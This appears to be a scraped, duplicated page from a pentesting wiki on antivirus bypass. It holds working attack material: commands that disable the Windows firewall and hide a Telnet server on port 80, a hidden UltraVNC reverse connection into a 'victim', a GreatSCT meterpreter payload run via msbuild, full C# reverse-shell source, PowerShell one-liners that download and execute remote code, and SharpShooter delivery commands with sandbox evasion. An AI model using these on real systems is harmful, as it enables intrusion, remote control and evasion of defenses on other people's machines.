AV Bypass

PreviousBasic PowerShell for Pentesters Nextmobile-apps-pentesting

Last updated 3 years ago

Was this helpful?

AV Bypass

Telnet Server

Until Windows10, all Windows came with a Telnet server that you could install (as administrator) doing:

pkgmgr /iu:"TelnetServer" /quiet

Make it start when the system is started and run it now:

sc config TlntSVR start= auto obj= localsystem

Change telnet port (stealth) and disable firewall:

tlntadmn config port=80netsh advfirewall set allprofiles state off

UltraVNC

Download it from:

Execute winvnc.exe and configure the server:

Enable the option Disable TrayIcon
Set a password in VNC Password
Set a password in View-Only Password

Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the victim

Reverse connection

The attacker should execute inside his host the binary vncviewer.exe -listen 5900 so it will be prepared to catch a reverse VNC connection. Then, it should execute inside the victim: winwnc.exe [-autoreconnect] -connect::5900

GreatSCT

git clone https://github.com/GreatSCT/GreatSCT.gitcd GreatSCT/setup/./setup.shcd .../GreatSCT.py

Inside GreatSCT:

use 1list #Listing available payloadsuse 9 #rev_tcp.pyset lhost 10.10.14.0sel lport 4444generate #payload is the default name#This will generate a meterpreter xml and a rcc file for msfconsole

Now start the lister with msfconsole -r file.rc and execute the xml payload with:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

Current defender will terminate the process very fast.

Compiling our own reverse shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

First C# Revershell

Compile it with:

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

Use it with:

using System;using System.Text;using System.IO;using System.Diagnostics;using System.ComponentModel;using System.Linq;using System.Net;using System.Net.Sockets;namespace ConnectBack{	public class Program	{		static StreamWriter streamWriter;		public static void Main(string[] args)		{			using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))			{				using(Stream stream = client.GetStream())				{					using(StreamReader rdr = new StreamReader(stream))					{						streamWriter = new StreamWriter(stream);						StringBuilder strInput = new StringBuilder();						Process p = new Process();						p.StartInfo.FileName = "cmd.exe";						p.StartInfo.CreateNoWindow = true;						p.StartInfo.UseShellExecute = false;						p.StartInfo.RedirectStandardOutput = true;						p.StartInfo.RedirectStandardInput = true;						p.StartInfo.RedirectStandardError = true;						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);						p.Start();						p.BeginOutputReadLine();						while(true)						{							strInput.Append(rdr.ReadLine());							//strInput.Append("\n");							p.StandardInput.WriteLine(strInput);							strInput.Remove(0, strInput.Length);						}					}				}			}		}		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)        {            StringBuilder strOutput = new StringBuilder();            if (!String.IsNullOrEmpty(outLine.Data))            {                try                {                    strOutput.Append(outLine.Data);                    streamWriter.WriteLine(strOutput);                    streamWriter.Flush();                }                catch (Exception err) { }            }        }	}}

C# using compiler

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt

Automatic download and execution:

64bit:powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell32bit:powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

C++

sudo apt-get install mingw-w64i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/

https://github.com/l0ss/Grouper2

https://github.com/Veil-Framework/Veilhttps://www.shellterproject.com/download/SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafeeSharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4https://github.com/TheWover/donuthttps://github.com/praetorian-code/vulcan

PreviousBasic PowerShell for Pentesters Nextmobile-apps-pentesting

Last updated 3 years ago

Was this helpful?

Telnet Server

Until Windows10, all Windows came with a Telnet server that you could install (as administrator) doing:

pkgmgr /iu:"TelnetServer" /quiet

Make it start when the system is started and run it now:

sc config TlntSVR start= auto obj= localsystem

Change telnet port (stealth) and disable firewall:

tlntadmn config port=80netsh advfirewall set allprofiles state off

UltraVNC

Download it from:

Execute winvnc.exe and configure the server:

Enable the option Disable TrayIcon
Set a password in VNC Password
Set a password in View-Only Password

Then, move the binary winvnc.exe and newly created file UltraVNC.ini inside the victim

Reverse connection

GreatSCT

Download it from:

git clone https://github.com/GreatSCT/GreatSCT.gitcd GreatSCT/setup/./setup.shcd .../GreatSCT.py

Inside GreatSCT:

use 1list #Listing available payloadsuse 9 #rev_tcp.pyset lhost 10.10.14.0sel lport 4444generate #payload is the default name#This will generate a meterpreter xml and a rcc file for msfconsole

Now start the lister with msfconsole -r file.rc and execute the xml payload with:

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

Current defender will terminate the process very fast.

Compiling our own reverse shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

First C# Revershell

Compile it with:

c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

Use it with:

using System;using System.Text;using System.IO;using System.Diagnostics;using System.ComponentModel;using System.Linq;using System.Net;using System.Net.Sockets;namespace ConnectBack{	public class Program	{		static StreamWriter streamWriter;		public static void Main(string[] args)		{			using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))			{				using(Stream stream = client.GetStream())				{					using(StreamReader rdr = new StreamReader(stream))					{						streamWriter = new StreamWriter(stream);						StringBuilder strInput = new StringBuilder();						Process p = new Process();						p.StartInfo.FileName = "cmd.exe";						p.StartInfo.CreateNoWindow = true;						p.StartInfo.UseShellExecute = false;						p.StartInfo.RedirectStandardOutput = true;						p.StartInfo.RedirectStandardInput = true;						p.StartInfo.RedirectStandardError = true;						p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);						p.Start();						p.BeginOutputReadLine();						while(true)						{							strInput.Append(rdr.ReadLine());							//strInput.Append("\n");							p.StandardInput.WriteLine(strInput);							strInput.Remove(0, strInput.Length);						}					}				}			}		}		private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)        {            StringBuilder strOutput = new StringBuilder();            if (!String.IsNullOrEmpty(outLine.Data))            {                try                {                    strOutput.Append(outLine.Data);                    streamWriter.WriteLine(strOutput);                    streamWriter.Flush();                }                catch (Exception err) { }            }        }	}}

C# using compiler

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt

Automatic download and execution:

64bit:powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell32bit:powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

C# obfuscators list:

C++

sudo apt-get install mingw-w64i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Merlin, Empire, Puppy, SalsaTools https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/

https://github.com/l0ss/Grouper2

https://github.com/Veil-Framework/Veilhttps://www.shellterproject.com/download/SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafeeSharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4https://github.com/TheWover/donuthttps://github.com/praetorian-code/vulcan

AV Bypass

AV Bypass

Telnet Server

UltraVNC

Reverse connection

GreatSCT

Compiling our own reverse shell

First C# Revershell

C# using compiler

C++

More

Telnet Server

UltraVNC

Reverse connection

GreatSCT

Compiling our own reverse shell

First C# Revershell

C# using compiler

C++

More